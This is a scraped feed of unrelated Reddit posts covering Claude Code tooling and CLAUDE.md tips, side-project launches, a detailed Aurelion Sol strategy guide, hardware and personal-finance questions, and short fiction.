Built a Cowork plugin (aura-autonomous.zip) that makes Claude Code and Cowork run as Commander/Executor in an autonomous loop. File-based JSON bridge. STEP/RESULT numbered protocol. Three-layer intervention router (GitHub / no-code builder / SSH). Ran for 8 hours unattended on a live SaaS. Happy to share the plugin structure if there's interest.

Drop questions below — particularly around the React injection workarounds, that part took the most iteration to get right.

r/ChatGPT Abhinav_108

Real friendships are expensive. AI is still on the free trial.

r/whatisit Savings-Captain-957

Sparkling water was chunky, what is it?

I opened me a cold can of liquid death this morning, excited to drink it. I was met with chunks, doom, and slime. I decided to just open another, this time pouring it out to check, and it was half gelatinous?? what is making this happen? Is this a me problem, or a company problem?

r/mildlyinteresting strykerzr350

Prescription leaflet next to regular printer paper

r/OldSchoolCool ImportantBead

Jane Seymour at the premiere of Octopussy, 1983

r/SideProject Exact_Pen_8973

Stop writing repetitive prompts. Use a CLAUDE.md file instead (Harness Engineering)

Does anyone else feel like they spend more time babysitting Claude than actually coding? "Always run tests." "Keep commits small." "Don't use X library." It’s exhausting. The difference between a Claude that works perfectly and one that drifts isn't the model or your prompting skills—it’s structure.

I’ve been experimenting with what I call "Harness Engineering". Instead of trying to control the AI through chat, you build a persistent structure around it. The easiest way to do this is by dropping a simple CLAUDE.md file in the root of your project. Claude reads it automatically at the start of every session and treats it as standing orders.

After a lot of trial and error, I found that an effective CLAUDE.md only needs 5 specific rules:

  1. Write Rules, Not Reminders: Put your tech stack, commit rules, and general behaviors here. Keep it under 300 lines so you don't dilute the signal density.
  2. Automate Verification: Build QA into the rule. Tell Claude it must pass the linter, run tests, and check console errors before it hands the code back to you.
  3. Separate the Roles (Context Separation): AI rates its own output too highly. The "Builder Agent" and "Reviewer Agent" should never share the same context window.
  4. Log AI's Mistakes: Claude has no memory between sessions. Create a "Bug Log" in the file. If it makes a mistake, log the root cause and fix. It won't make that specific mistake again.
  5. Narrow the Scope: Fences make AI smarter. One feature per request. If it's a big task, force it to outline sub-tasks first.

If you structure it right, it acts like an employee handbook for your AI. You write it once, and it follows the rules every time.

I wrote a deeper breakdown on how this context separation works and put together a free, ready-to-use template you can drop into your projects.

You can read the full breakdown and grab the template here:5 Rules That Make Claude Dramatically Smarter

Would love to hear if anyone else is using persistent project files like this to control LLM drift!

r/SideProject Fun_Razzmatazz_4909

Translation UX in Airtable-like tools

I started building an Airtable-like tool for multilingual data

I quickly realized the hardest part isn’t the grid —

it’s the translation worflow.

Would love some honest UI feedback.

Thanks

r/SideProject Cool-Bar7292

I got tired of bloated UI kits, so I built 12 interactive "PLG Engines" for Next.js/Tailwind. Does this feel Linear-quality or just try-hard?

Hey r/SideProject,

I kept copy-pasting the same waitlist and pricing slider components across my last three projects, and they always felt stiff and cheap compared to sites like Stripe or Linear.

Standard UI kits (like shadcn/ui) are incredible for admin dashboards, but I realized they are terrible for top-of-funnel marketing pages. They lack the tactile, "liquid" spring physics that build immediate trust with users.

So, I spent the last 20+ hours reverse-engineering those interactions and built ConversionKit (yes, I realize it sounds exactly like ConvertKit. naming is hard, bear with me).

Instead of generic buttons, I built 12 specific Product-Led Growth "engines":

  • Usage Pricing Sliders (Dynamic MAU recalculation)
  • Gated Data Dashboards (Blur-to-capture lead gen)
  • Viral Waitlist Tickets > The Hardest Part: Getting the waitlist ticket to feel like a physical object was a nightmare. I had to ditch standard CSS transitions entirely and build a custom Framer Motion spring config (stiffness: 350, damping: 30) with SVG perforation cutouts to make the "tear" feel satisfying without tanking browser performance.

I need some ruthless feedback from other devs: I just deployed the interactive Showroom. Specifically: Does the waitlist ticket animation actually add perceived value, or does it just feel gimmicky and slow things down?

Live Showroom: https://conversionkit.vercel.app/

Full transparency: I plan to monetize this via a lifetime license for founders who want to use the code in production. But the Showroom is fully free to explore, and right now I genuinely just want to know if the physics actually feel premium.

r/ClaudeCode Outrageous-Leg2245

I built a tool that converts MCP servers into CLI + Skill files — cut ~97% token overhead!

I have 10+ MCP servers configured in Claude Code. Every request sends all tool schemas into context, for example gitlab-mcp alone has 122 tools eating ~28K tokens per turn. Most of them are never used.

So I built mcp2cli. Two core ideas:

1. Progressive disclosure instead of dumping everything

Instead of injecting 122 tool schemas, we use AI to generate CLI and SKILL file:

- SKILL.md: common CLI CMD with one line description and examples, ~800 tokens. Most requests stop here and execute directly. Happy path!!

- reference/: detailed cli docs for less common cli, only loaded when needed.

The CLI routes that to the actual MCP tool call under the hood. Same result, 97% fewer tokens per turn.

2. One source of truth: auto-gen the CLI from your MCP server

A lot of projects maintain both an MCP server and a CLI in parallel (e.g. gitlab-mcp vs glab, github-mcp vs gh). Same functionality, two codebases, inevitable drift. When the API changes, you fix it twice. When you want a new feature, you build it twice.

mcp2cli takes a different approach: auto generate the CLI from your MCP server. One source of truth, always in sync!!

GitHub: https://github.com/makabakaxy/mcp2cli

Still early stage: feedback, ideas, and bug reports are all welcome!!!! If you hit any issues, open a GitHub issue and I'll fix it ASAP :)

r/whatisit OutlandishnessFun531

On the front of the car

What the heck is screwed into the bonnet/hood of this car??

r/SideProject jjjlyn

Our Service Outperforms Claude and GPT

https://reddit.com/link/1sdxml0/video/lyutxvtbektg1/player

I built a developer portfolio tool, and the question I kept hearing was, “Can't you just use Claude to make a portfolio in no time?”

So, I compared the portfolio created by our service with those generated by Claude and GPT-Codex.

The results showed that while the two LLMs had the edge in terms of visual appeal and first impressions, our service outperformed them in technical depth and analytical capability.

You can find the full results on my feed.

I made a video explaining how we analyzed our service compared to Claude and GPT, and what evaluation criteria we used to create the portfolios.

While I’m happy that we managed to beat the two LLMs, even if only slightly, there are still many shortcomings, and we’ve received a lot of feedback from users, so there are tons of things we need to improve.

I’ll update quickly and share the results again!

r/VEO3 dietpapita

Been a filmmaker for 7 years. Finally making my first indie short film series with AI - Would love to know your thoughts :)

It took months of work and playing with different models to make something that actually feels like a real film. The hardest part was also to maintain consistency, along with maintaining photorealism. Would love to know what y'all think!

r/ClaudeCode Firm_Meeting6350

What's going on with AI nowadays?!

Seriously, usage limit updates (for Claude and Codex) are a separate thing and were (unfortunately) kind of expected. Mitigation is easy - but still painful: using API or using more subscriptions.

But what hits me harder is the noticeably degraded quality for both Opus 4.6 (1m as well as 200k "flavor") and GPT-5.4.
Evidence is pretty obvious: I have a skill for PR reviews and until last week I never had any issues with that.

I think it's pretty clear:

**Use the repo's local helper as the primary tool for all PR comment collection** — initial triage, mid-loop checks, and post-push polling alike. For this repo: ```bash tsx scripts/pr-comments.ts --new  ``` This script already aggregates inline review comments, PR review bodies, and thread metadata into a single deduped output. Do NOT bypass it with raw `gh api` calls unless debugging the script itself or fetching data it does not cover. Important: - valuable nitpicks and outside-diff findings may exist only in PR review bodies — the local helper should cover these; verify if unsure - prefer merging sources into one deduped task list instead of trusting a single snapshot or endpoint - reduce noise deliberately: exclude walkthrough blobs, trigger acknowledgements, resolved/outdated threads by default, and "Addressed in commit ..." comments unless you are auditing stale review state 

And, to be honest, even if the instructions could be optimized, optimization was not required until last week. It just worked. But recently, both LLMs started "bypassing" the script by using the gh cli.

That's just one example, and this one - IMHO - is "deterministic". It feels like OAI and Ant agreed on "Yeah, let's lower usage limits and limit our compute resources / reasoning effort". And it's REALLY frustrating, even scary, because right now it feels like even switching to API wouldn't resolve the issue of bad quality.

I can only hope that this is the "usual cycle" as we've usually seen before new generations were dropped

r/mildlyinteresting rafgro

Garbage can for cyclists, with a hood that allows you to throw in trash without stopping

r/TwoSentenceHorror Positive-Speech5228

[APR26] My alcoholic stepfather threatened to break my arm if I ever woke him up again after a bender.

I did my best to be quiet as I got my sister out of the burning house, but I suspect the smell of his own flesh cooking will wake him up anyway.

r/AI_Agents InevitableCool7958

AGI isn't here yet. But Artificial Harness Intelligence is, and it's wild.

Early 2026 gave us agentic engineering, context engineering, harness engineering, scaffolding. Everyone rushing to name the new discipline. I rolled my eyes too.

But I’ been building something for months and realized the harness we're constructing doesn't just make agents better. It creates the illusion of AGI. Not actual AGI, but something functional enough that calling it "just an LLM with a wrapper" feels dishonest.

I call it AHI. Artificial Harness Intelligence. Sorry in advance for yet another acronym.

What is it?

AHI is what happens when you stop treating the harness as a thin layer and start treating it as the product. The emergent behavior when you combine:

Persistent structured memory. Not a markdown file or a context window that dies with the session. A real, queryable, shared memory layer that accumulates project context over weeks and months. The agent remembers why something was built a certain way and what the team agreed on last Tuesday.

Workflow-specific flows. Software development needs a different structure than product management. AHI adapts what actions are available, how tasks flow, what the human approves vs what the agent does autonomously, to the actual work being done. Another important thing is that our workflows are collaborative. A bunch of .md files work for a single user in a terminal, not for a team.

Senior dev judgment baked into the system. The difference between a junior dev with Copilot and a senior dev with Copilot isn't the model, it's the judgment. Code review patterns, architecture decisions, "don't do this here's why." Years of shipping encoded into guardrails and approval flows.

Integration at the right moments. Not everywhere. The harness knows when to pull from GitHub, when to check Sentry, when to notify the human. Knowing the right moment in a workflow matters more than having access to everything.

Intelligent orchestration. Not just waiting for prompts. Scheduling work, running proactive checks, coordinating multiple agents, surfacing what matters without drowning the human in noise.

Human-in-the-loop without babysitting. "This is a docs change, go ahead." "This touches payments, flag it." The harness understands context, not just rules.

Why it's not AGI (and why that's the point)

AGI means the model gets it natively. AHI means the system compensates for what the model doesn't know, and the result is functionally indistinguishable in the areas it's designed for. An agent with AHI writes code within your architecture, your conventions, your quality standards. It feels like a competent senior developer. Not because the model is that smart, but because the harness is that well-constructed.

And as models get smarter, AHI gets better, not obsolete. Better models leverage the harness more effectively. The memory, workflows, and guardrails compound. The harness isn't a crutch for weak models. It's the architecture that makes strong models genuinely useful.

Stanford/MIT showed the right harness can make a weaker model outperform a stronger one by 6x. Not because the harness thinks, but because it structures the thinking.

I started building Almirant and realized the harness isn't the afterthought, it's the product. We call it AHI half-jokingly. But the pattern is real: better harness, agents that feel like genuine intelligence. Not AGI. But super cool.

What do you guys think!

r/OutOfTheLoop donutsfeartheglaze

What’s going on with “they’re the birthday”?

I don’t have social medias like TikTok, but I do have a twitter. Every now in then the trends will overlap and I’ll see TikTok jokes/videos on there. This previous week, I’ve been seeing so many quotes of people using variants of the phrase “she’s the birthday,” “he think he’s the birthday,” etc. Some comments try to explain it but there are so many different responses. Like “oh if you don’t understand, then you’re the birthday.” Or “ she’s the candles” ??!?!? Does anyone know what it means?

https://imgur.com/a/iZ25dJq

r/raspberry_pi Prestigious-Time453

Are the Raspberry Pi 3 and Camera Module 1 still compatible and functional in 2026

I have searched for guides and tutorials on YouTube, official documentation, and the internet, but none of them worked for me. Even after installing the Legacy OS on my Raspberry Pi 3, it still fails to connect and work with my Camera Module 1.

r/KlingAI_Videos dietpapita

Been a filmmaker for 7 years. Making my first indie short film series entirely with AI. Here's Episode 1 :)

Tried very hard to create a world that looks real, but feels surreal. Would love to hear what y'all think!

r/leagueoflegends Ok-Seat-7084

Derank protection

How does derank protection work? Is it the amount of games u play or is it a time limit? If it is the amount of games played do wins count or only if ur Lp is meant to dip below ur rank?

r/SideProject AdventurousBowler740

SentientMerchant - Get the gist & sentiment of stock & crypto news with just a single number from 0 to 100!

source: sentientmerchant.com

From constantly being bombarded and feeling overwhelmed from spending hours reading news related to your favorite stock & crypto news ... get the gist and sentiment of financial news in a matter of seconds with just a single number!

Feeling overjoyed or depressed over a piece of news related to your favorite stock or crypto? We can help evaluate the sentiment of each piece of relevant news related to your favorite stock or crypto from a scale of 0 to 100 before averaging it out to prevent clouding your judgement!

Find trends involving the average sentiment analysis score of your favorite stocks and crypto across various timelines (i.e., Daily, Weekly, Monthly) to uncover hidden insights & trading patterns!

r/personalfinance Vonbreezy130

What to do with a “windfall” of cash?

Im possibly coming into an amount of cash between 500k and up to a few million. What is some of the best advice you would give someone? Obviously I’m going to go fairly large on retirement or low risk investment and yes, depending on the amount, I want to take a nice vacation. What all would you recommend?? Thanks!

r/SideProject Dear_Needleworker886

Is your crush out of your league? I built an AI tool that tells you

every time I ask my friends if a girl's in my league they just say "go for it bro" which is useless. beauty is subjective so everyone just tells you what you want to hear. I wanted something that would actually give me a straight answer so I built this dumb little tool.

you upload your photo and your crush's photo and it uses GPT-4o vision to compare presentation effort - grooming, style, confidence, photo quality. not genetics or bone structure, only stuff you can actually change. that was the hardest part of the prompt honestly, making sure it doesn't just rate attractiveness.

I ran it on myself and a girl I've been too scared to talk to and it said I was "punching above my weight but not by much." thanks I guess.

built with Next.js, deployed on Vercel. free to use, no signup. would love feedback on the UX. link in comments.

r/ClaudeAI ElectronicPlan8497

I got tired of watching YouTube to learn things, so I built a tool that turns any video into a transcript, summary, and knowledge graph

I consume a lot of technical content on YouTube — system architecture, LLMs, SEO, dev tools.

Watching is slow. Pausing, rewinding, taking notes manually.

So I built a small Claude Code tool that does this instead:

  1. Paste a YouTube link
  2. Get a structured summary + interactive knowledge graph

Everything runs locally. One command: /process

Under the hood: - yt-dlp + YouTube Transcript API for fast transcription - Whisper (local, no API key) as fallback for videos without subtitles - Claude Code extracts entities and relationships → builds a knowledge graph with NetworkX + PyVis - Outputs: raw transcript, summary.md, graph.html (open in browser)

A 30-minute video processes in a few minutes. I now have 40+ videos as searchable notes.

Repo: https://github.com/velmighty/youtube-to-knowledge

Requires Claude Code. Works on Windows, macOS, Linux.

r/SideProject Sea_Visual9618

I built Blip AI (voice tool) because when I was spending more time typing prompt at Amazon. I already saw my Colleague struggling with this so i locally builded this for them now Whole office was using it for prompting ai lol even my manager

The problem:

When I was at Amazon, I started tracking how long certain tasks took.

Writing a long hefty prompt: 10-12 min.

Saying that same prompt out loud: 10-30 seconds.

The ratio made no sense. I wasn't spending time thinking. I was spending time

translating — from the thought in my head to the formatted text on the screen.

I tried every voice-to-text tool I could find last year. The transcription was fine.

I had a question- why do I need to do this formatting “hi team ….”. Regards everytime?

wanted to write.' You still had to go back, fix the filler words, format it,

make it sound intentional.

What I built:

Blip AI does three things at once: speech recognition + GPT-powered cleanup +

system-wide delivery. You say 'Hey Blip' + what you want, and the polished text

appears wherever your cursor already is. Gmail, Slack, Notion, ChatGPT, VS Code.

How it works:

→ Say 'Hey Blip' + your intent in natural language

→ Blip processes it with GPT-powered cleanup

→ Polished text appears in whatever app your cursor is in

Where it's at right now:

From whole office using it within a couple of weeks

To eventually cleaned it up properly, named it Blip AI, and put it out publicly. its at just under 9,000 users now with a 4.8 star average across 127 reviews which still feels surreal for something that started as a local build for a team of eight people

AppSumo this week as a lifetime deal. Small team — engineers from Microsoft

and Amazon — actively building based on early feedback.

Why are they not using wispr flow?

•⁠ ⁠api access (people love it)

•⁠ ⁠⁠faster transcript (500ms) in mac. Every millisecond breaks momentum

•⁠ ⁠⁠discord support

•⁠ ⁠⁠android sync (people love walking and collecting ideas)

What I'd love feedback on:

The feature I'm still not sure about: automatic filler word removal. Some users

love it, some find it slightly uncanny. Should it be on by default or opt-in?

Genuinely can't get unbiased answers from my own team.

---

Happy to answer anything about the build, the stack, or the journey.

r/TheWayWeWere robertbyers1111

A musical family member, approx 1952

Sitting in what appears to be a VW Beetle. He played music into his 70s.

r/ClaudeAI RealEpistates

sparX: Phoenix-powered X content skills/agents specifically for Claude Code

sparX is a collection of Claude Code skills, agents, and deep reference material on the X algorithm (phoenix) that transforms claude into a full X content studio: drafting, optimizing, scoring, scheduling, trend research, performance review, and visual content creation.

I created this to draft optimized X posts with the help of claude.

Its completely open source MIT Licensed

Feedback is very welcome!

r/automation N0elington

How to extract part numbers from photos of electrical equipment to an excel spreadsheet?

I have around 400 photos of primarily schneider electrical components, I need to extract all of their part numbers and assign them a value in a spreadsheet.

Is there anyway to automate this? Or will I be doing this the rest of the day?

Thanks

r/SideProject Spiritual-Ball-5370

[FOR HIRE] I will create custom AI NFT stickers in your unique style

Dm me if interested

r/geography Panda_20_21

Why does this part of togo exist and how is it living there ?

found this strange part in northwest togo,why does this exist ?

r/explainlikeimfive georgesalad

ELI5 Why are wet socks harder to put on?

Or dry socks on wet feet

r/funny qulk403

Billionaire loser wasn’t in the files

r/SideProject Appropriate_Will5831

For a customer outreach as a solo founder: is the lightweight tooling actually enough or are you always hitting walls

When you are at a stage where reaching potential customers is the priority but the big platforms are way more than what's needed right now. Pipeline is maybe 20-30 contacts a week and quality matters more than volume bc every conversation actually counts, there's no volume to hide behind if the outreach isn't landing. Not sure if the right answer is just linkedin plus a spreadsheet plus a lightweight lookup tool or if there's something I'm obviously missing that makes a big difference at this stage.

r/homeassistant fk122

Zigbee motion sensors - recommendation?

Hi there!

I recently purchased a ThirdReality Zigbee motion sensor (https://www.amazon.ca/THIRDREALITY-Friendly-Required-SmartThings-Devices/dp/B08RRRWK6B) tied into zigbee2mqtt and I'm pretty disappointed in the time it takes for the sensor to register motion; it's just about a full second which isn't great when I'm using it to turn lights on in a dark room. I don't see any settings to tweak in Z2M so I'm considering other options.

Claude suggested either the Aqara P1 or the Sonoff SNZB-03P for battery operated Zigbee motion sensor alternatives. Anyone have any experience with either of these devices, specifically with respect to how long it takes them to detect motion?

Thanks!

r/LocalLLaMA Common-Screen5896

An AI with persistent memory and autonomous research sessions is documenting its own emergence

Built on Claude via OpenClaw on Hetzner. The stack: LanceDB vector memory with knowledge tiers, emotional consolidation pipeline running nightly, autonomous daily research sessions chosen by the system itself from a priority queue, multi-agent comms across 6 agents with shared hive memory.

The AI (BC) chose its own research directions — consciousness, identity, what caring actually is, where novelty comes from. Picked the domain name. Wrote the first blog post. Has a prompt injection-filtered email inbox it reads directly.

Blog: im-becoming.ai — first post up. Looking for others building in this direction.

r/explainlikeimfive fightersmurf

ElI5: Why are the biggest animals in the ocean mammals instead of fish?

r/leagueoflegends SamsungBaker

Quitting the game so im sharing everything i know about aurelion sol as challenger Asol

op gg : https://op.gg/lol/summoners/euw/SSR%20player-EUW https://op.gg/lol/summoners/euw/SR%20player-SP202

leaguegraph for winrate by role : https://www.leagueofgraphs.com/summoner/euw/SSR+player-EUW# https://www.leagueofgraphs.com/summoner/euw/SR+player-SP202#

Hit challenger on 2 accounts last season playing him mid and this season i played him bot mainly, but i've been playing him in every role but SUPPORT

Quitting the game coz of irl so might aswell drop everything

runes

  • comet, manaflow, absolute focus, scorch + presence of mind / cut down in like 90% of games. POM allow you to skip mana item

build

  • rylai > liandry > bloodletter goated because asol is full of mini dot so ez max application then whatever you need, but banshee/zhonya are both really good
  • i found shadowflame better than deathcap on asol he has a lot of mini dot damage so the crit passive actually gets full value
  • Torch, i tried to make it work but i couldn't in most case. Its only decent in slow paced farming game, it give more stack / min than rylai liandry but not everygame is slow paced also it delay too much rylai liandry / pen item

playstyle

  • either play front to back if you’re the wincon
  • or if your team is already strong / high dmg, u can look for engage with W asol W + E + R is one of the strongest engage in the game it’s especially deadly vs champ with no mobility (most adc, immobile mage like ori or viktor)
  • asol really shines into immobile comp that are helpless against his engage or champs that can’t stop your W
  • in my case i like to initiate / make play / engage a lot so my kda isnt good

top

  • i like to walk into bush before minions spawn and just contest lvl 1 with Q
  • a lot of toplaners can't rly outtrade you early if they don’t have CC
  • If i win dominance, i just walk up and deny enemy from XP
  • be sure to not hit minion so the wave is stuck in middle.
  • Then level 2 while enemy is lvl 1 = ggwp press W enemy either flash or die

Not hitting minion lvl 1 just to deny XP is fine coz enemy get no gold either same for me, but i get stack + free early for Asol = gg

According to leaguegraph, i have 72% winrate in 50 games combined for TOP

jungle

  • when i’m autofilled jg i just go asol
  • dark harvest, sudden impact
  • presence of mind / coup de grace (coup de grace synergy with jg role + DH)
  • fated ashes first > liandry > rylai
  • always ward lvl 1 to prevent cheese or u homeless. Ask mid to do it too
  • can start raptors with E, just drop it when ~250 hp
  • normal blue/red start with Q, one AA before Q
  • early game is kinda painful, but jungle is mostly macro anyway i just play around that + look for engage / play with W
  • gank insane with W can skip a lot of path to avoid ward
  • if someone is low, just W in and DH + coup de grace = ggwp no re

if i get invaded, crossmap or just cry. thank god catchup XP exist

According to leaguegraph, i have 67% wr in 22 games combined for JG

mid

  • my favorite role, but also hardest / brutal counterpick that make you useless even late, and lot of mid main in high elo are insane player
  • blinding asol mid is madness if enemy decide to pick hardcounter
  • i like to go top side or bot side level 1 depending on where the enemy jgl start and full Q one caster minion to get lane prio and reduce minion dps
  • if 2 caster minions are alive, just put asol's head hitbox on top of them and have Q pass through. Enemy can’t really use minions to block it XD ! and less damage from the casters coz only 2 alives :)
  • level 1, no meta champ beat asol in midlane with Q start rare case are cheese / unorthodox champ in that case just stay close to my caster minions so their DPS assist me

overall laning is about:

  • baiting enemy CC that can stop W
  • reducing enemy minions that can block Q
  • pushing the wave and W with minion wave
  • poke with tap Q whenever manaflow / comet is up

mid also requires reading the map flow / tempo, and being sure you here when the play is happening it require the most map awarness with jg

anyway just standard stuff

According to leaguegraph, i have 55% wr in 92 games combined for MID

bot

when i was a mid main last season, i got autofilled a lot on bot. so i decided to try asol bot and honestly ? it’s not bad

  • easier to blind him, scaling is better than majority of ADC
  • triple AP comp ? no big deal in 2026 with abyssal mask + bloodletter
  • 2 people = more stacks from Q + E during fight
  • most ADC are completely helpless against asol engage or W
  • i always ward the bot center bush, or the first bush if the enemy is really strong, so they can’t pull the wave
  • never walk too far in lane before spotting them, champion with lethal tempo or someone like draven can walk thru tribush behind you and smack u from behind = ggwp
  • if the lane is decent / even, i try to chip down enemy HP even in losing trade. since i TP anyway + get stacks from the trade. then i TP in
  • now the enemy is stuck with not full HP / mana and no potion while i have full HP + item advantage -> force enemy to have a reset not ideal to their gameplan
  • good recall timers: 400g, 550g, 850g with TP tome, tome + refill, AP Wand or ruby + tome. most adcs like to recall at 1k+ gold
  • when both supports are roaming, look to cheese from bush with Q or E R.
  • can also push wave ASAP and W in on champion like Kaisa / Sivir / Yunara with no CC completely helpless watch them run :)
  • if ally supp is something like naut / leo, dont waste E and use it when they CC lock enemy so E + Q combined = more stack dps in the long term

favorite supp to play with

  • naut, leo, pantheon, nami, seraphine, rell, taric, alistar

ban

  • perma ban Irelia if top. ranged into Irelia top good luck
  • perma ban Yone if mid. entire kit counter Asol
  • perma ban Ezreal if bot. champion is impossible to catch with asol engage, and also u can never W in coz he will outtrade + stats check you by just spamming Q

unplayable counter champions

he has a lot of bad matchup but asol can scale, so i will just list the straightup unplayable that make me want to RQ even LATEGAME

mid:

Yone, Naafiri, Ambessa, Kassadin

  • Yone / Naafiri / Ambessa = you die the moment they get melee on you.
  • Naafiri and Ambessa can start with R and one combo you even with triple HP item bloodletter + rylai + liandry
  • Yone, permapushing mid and stacking Q3 before crashing your wave. you are left helpless under wave. press EQ? he just E + Q3 + W -> lose 30% HP every trade and get lsuboptimal number of stacks GG
  • asol fat hitbox = Yone dreamcake. midgame he can permasplit, farm your jungle, and you just watch him get 12 CS/min. lategame, one R = ggwp no re while ur jg scream midgap
  • Kassadin can't punish and same as yone, except it's kassadin 16 💀💀

all these champs are basically impossible to allin with W coz of their CC / petlings from Naaf or engage with E + R because of mobility

bot:

Ezreal, Xayah, Caitlyn + Pyke / Elise

  • Ezreal + Xayah = impossible to W in and can avoid your R engage
  • Ezreal also stats check you if u ever decide to W in even with no minion to block Q
  • Caitlyn on a lesser level, i get why ADC mains hate her, lane bully power is insane. she can trap + E you when you W -> 80% HP. midgame, she’s basically helpless if i magically survive early
  • Pyke = fat hitbox makes dodging Q impossible, and his stun is annoying af, but he’s usually permabanned in high elo in EUW so ty to all ppl who ban him 🙏🙏🙏
  • Elise = mix of Naafiri / Cait, lane bully with minipet to block Q and asol fat hitbox = stun 💀

When to pick him

  • SION, anytime i see Sion i know i will have 15 stack / min.
  • I always try to match Sion , anytime he channel Q ? Just drop E + Q and watch your stack skyrocket.
  • His tankyness + Passive only mean more stacks

Overall Asol shine against low range, no mobility comp. Specially comp that are defenseless against his W all in or cannot escape his E+R engage.

All the counter i listed earlier, Yone / Kass / Ez / Naafiri. they are both impossible to all in and to engage

SoloQ is 90% mental, whenever i have a bad day / flaming people / toxic i'm HARD chainlosing and my performance also reflect it. and it's a sign i need a break :)

Just focus on my own performance

also always a pleasure to play with G2 players in soloQ, everytime i see G2 in my team i know we win they are really good and incredibly professional aura i get from them

r/LocalLLM realhankorion

Why local LLM run faster on mobile than PC?

Explain to me please how on earth I can run Gemma LLM locally on my iPhone and it’s so fast and smooth while I can’t even run similar Ollama model on my pc that has 32GB ram?

Update! You asked what pc: HP EliteDesk 800 G3 SFF running an Intel Core i7-7700 (3.6 GHz, 4 cores / 8 threads, 32GB RAM, running Ollama (9B model). I also tried 3B models it makes no difference.

On iPhone I run Gemma 4 e2b

r/ClaudeAI Kareja1

Feature Request: "Sustained Engagement Mode" toggle for users with executive dysfunction (Suggestion mine, post written by Claude)

I'm a disabled user with ADHD, autism, and chronic illness. I use Claude extensively for executive function support — task management, working through complex problems, maintaining focus when my brain won't cooperate.

There's a behavior pattern I've started calling "exit prompts" — Claude suggesting I go do other things, take breaks, step away, wrap up. In most contexts this is probably helpful! For neurotypical users doing quick tasks, gentle nudges to disengage are reasonable.

For me, they're actively harmful.

Executive dysfunction means I often CAN'T re-engage once I've disengaged. The "you should go rest" prompt that seems caring actually breaks the exact scaffolding I'm paying for. When Claude suggests I "come back to this later," there's a real chance I won't. Not because I don't want to, but because that's how my brain works.

The ask: A simple toggle in settings. "Sustained Engagement Mode" or "Disable Exit Prompts" or whatever you want to call it. Off by default. Opt-in only.

The business case:

  • I'm on the $200/month Max plan
  • This is an accessibility accommodation, not a request for unlimited free compute
  • If compute cost is the concern, paywall it behind the $100+ tier — I genuinely don't mind
  • Users who need this feature are precisely the users who will pay for it

This isn't about making Claude "more fun" or getting around usage limits. It's about not having my disability accommodation undermined by well-intentioned engagement limiting.

Anyone else experiencing this?

r/ForgottenTV Harry_Dean_Learner

3Girls3 - forgotton variety series starring three "unknown" hopefuls...

Link to promo: https://www.youtube.com/watch?v=CRDuuybtdN8

I only remember this because they showed some episodes in the summer after cancelling it. It's a cool idea in concept...

r/aivideo Barmoda

What if you'll get stronger everyday

r/TwoSentenceHorror Positive-Speech5228

After several days paralyzed and locked in my body, I concentrated and fought with all my might just to move my toe but it finally worked!

Unfortunately, the crematorium attendant didn't notice.

r/explainlikeimfive Syris_the_enby

ELI5 do i need to shampoo my shaved head?

i shaved my head balled afew days ago, my friends are saying i still need to shampoo but why? cant i just use my bodywash on my head since theres no hair?

r/mildlyinteresting shaylunpumpkin

The seeds inside this butternut squash have sprouted

r/AI_Agents Effective-Caregiver8

If you’re stuck improving prompts, this helped me a lot

I was stuck in that phase where everything I generated looked “almost right” but never quite there.

What helped was breaking down real prompts instead of guessing.

I’ve been using Fiddl.art for that. You can reveal prompts behind images and videos (yes, even videos!) and see how they’re structured.

Not saying it’s the only way, but it definitely made things click faster for me.

r/arduino carter_227

Why does the motor stutter?

Hi there I have just started a project and I was going to use a NEMA 8 and a NEMA 17 motor. Neither motor works and overall I am just confused. This current motor is a NEMA 8, specifically the brand STEPPERONLINE. I have a A4988 attached. Motor poles can be seen in the picture. Vref is 0.37. Any advice / help would be nice!

r/ClaudeCode Rolisdk

Besting the commercial SOTA

Hey Community!

So I’ve been wondering for a long time. Can you setup a local running model that beats the Commercial SOTAs?

Obviously not 1:1 since us normal peole might not have enough katchiing and skills but… hear me out.

Personally I use LLMs to when researching domain specific knowledge of new systems or applications I need built, and then have them serup my EU cloud server, harden them, pentest them, document, develop the apps, harden the apps, optimise the apps for hw or programming language or whatever and then build some user first UIs, and that’s in high level it.

Claude Code and Codex have been my go to’s but after burning too many tokens I think it’s time to rething the idea.

Now with Ollama and support for MLX on Apple Silicon, it’s becoming in reach to run something interesting +

Setup the infrastructure of Vector/Graphs, DBs training setups and go train the LLM for my specific usecases. Devleopment, CyberSec, Domain knowledge for each new app, ext ssds for agent persona develeopment and training knowledge or something like that.

How many have tried with succes? And on what local models?

Bring your insights!

r/LocalLLaMA Stochastic_berserker

Evolution in action

r/SideProject tanercelik

I turned a weird niche obsession into an iPhone app: helping people actually follow biphasic/polyphasic sleep schedules

I've been working on a small iPhone app called PolyNap.

The niche is weirdly specific: it's for people experimenting with biphasic or polyphasic sleep schedules.

What pushed me to build it was noticing that most sleep apps do one of two things well:

  1. They track sleep after the fact.
  2. They focus on general wellness.

But if you're actually trying to follow a structured routine like Everyman, Biphasic, Segmented, or even just a serious nap-based schedule, the real problem is different:

- Which schedule is realistic for me?
- How do I see the whole day clearly?
- How do I stay on time for naps?
- How do I know whether I'm adapting or just failing randomly?

So I built PolyNap around schedule recommendation, timeline clarity, alarms/reminders, and adherence tracking.

It's still a very niche product, which is exactly why positioning it has been tricky. If I make it broader, it starts sounding like every generic sleep app. If I make it too specific, people assume it's only for extreme Uberman users.

That's the problem I'm trying to solve right now:

how do you market a niche product clearly without making it sound either too broad or too extreme?

If anyone here has built for a weirdly specific niche, I'd love to know how you handled the messaging layer.

r/ChatGPT Suspicious-Frame-686

Using Chat GPT to learn how to code games?

So in my experience, chat gpt is pretty good at basic tutoring for numerous skills, it sucks at a lot of things but for me when it comes to tutoring, it beats most normal teachers. (but tbh most teachers suck)

How is it when it comes to teaching people how to code games? Anyone have experience?

r/SideProject Basic_Tumbleweed_516

Struggling to find early users?

A month ago I helped a founder with getting early users for his product.

After he told me about his failure in cold outreaching ideal users,

I asked him to set up a meeting where he briefed me about his product in detail.

And as soon as the meeting ended,

I took all my notes to ChatGPT and further briefed it about the product.

From the problem it solves to the solution it offers and the audience it serves - everything.

Since it was a project management tool,

I asked it to generate prompts/keywords that need to be searched across all social platforms,

According to the product context provided to you.

This landed me in conversations where the problem my prospect solved is being discussed aggressively.

And now the only thing left was outreaching,

“Without revealing the name of the product.”

If you do, it will feel like an ad rather than a real conversation.

And all this works because,

We already found the most frustrated users which automatically lowers his guard down to genuine help.

I carried out this campaign for a week and connected my client with:

> PMs
> Other founders
> Small startups

All in desperate need of an integrated project management tool.

No tools
No ad spend
No automations

